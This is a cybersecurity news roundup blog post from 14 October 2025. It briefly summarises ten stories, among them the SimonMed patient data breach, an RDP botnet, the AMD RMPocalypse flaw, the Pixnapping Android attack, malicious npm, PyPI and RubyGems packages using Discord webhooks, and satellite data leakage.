CyberNews: 14/10/2025 Edition

Published by Dunateo on 2025-10-14

Today’s roundup

  • SimonMed says 1.2 million patients impacted in January data breach
  • Massive multi-country botnet targets RDP services in the US
  • RMPocalypse: Single 8-Byte Write Shatters AMD’s SEV-SNP Confidential Computing
  • New Pixnapping Android Flaw Lets Rogue Apps Steal 2FA Codes Without Permissions
  • npm, PyPI, and RubyGems Packages Found Sending Developer Data to Discord Channels
  • Researchers Expose TA585’s MonsterV2 Malware Capabilities and Attack Chain
  • Chinese Hackers Use Trusted ArcGIS App For Year-Long Persistence
  • UK NCSC Reports 429 cyberattacks in a year, with nationally significant cases more than doubling
  • Unverified COTS hardware enables persistent attacks in small satellites via SpyChain
  • Satellites Are Leaking the World’s Secrets: Calls, Texts, Military and Corporate Data

    • Summary

    U.S. medical imaging provider SimonMed Imaging is notifying over 1.2 million individuals of a data breach from January 2025 that exposed sensitive patient information.

    A massive, multi-country botnet has been observed targeting Remote Desktop Protocol (RDP) services in the United States, operating from more than 100,000 IP addresses.

    AMD has released fixes for "RMPocalypse," a critical flaw undermining Secure Encrypted Virtualization with Secure Nested Paging (SEV-SNP) via an 8-byte memory write, discovered by ETH Zürich.

    A new "Pixnapping" side-channel attack impacts Google and Samsung Android devices, allowing rogue apps to steal 2FA codes and sensitive data pixel-by-pixel without requiring permissions.

    Malicious packages across npm, PyPI, and RubyGems ecosystems are using Discord as a command-and-control (C2) channel to exfiltrate stolen developer data via webhooks.

    Researchers have exposed TA585, a previously undocumented threat actor, deploying MonsterV2 malware through sophisticated phishing campaigns utilizing web injections.

    Chinese-backed Flax Typhoon attackers maintained year-long persistent access to an ArcGIS system, as detailed in a ReliaQuest report on nation-state activities.

    The UK's NCSC reported 429 cyber incidents between September 2024 and August 2025, with "nationally significant" cases more than doubling to 204. The government urges FTSE 350 leaders to prioritize cyber resilience.

    "SpyChain" demonstrates persistent, multi-component supply chain attacks on small satellite systems using unverified COTS hardware, achieving covert data exfiltration through "stealth by design," tested with NASA’s NOS3 simulator.

    Unencrypted military, corporate, and personal data, including T-Mobile calls and texts, is reportedly leaking from satellites, discoverable with as little as $800 in equipment.

    Want to dig deeper?

    Cyber Groups

    Typhoon China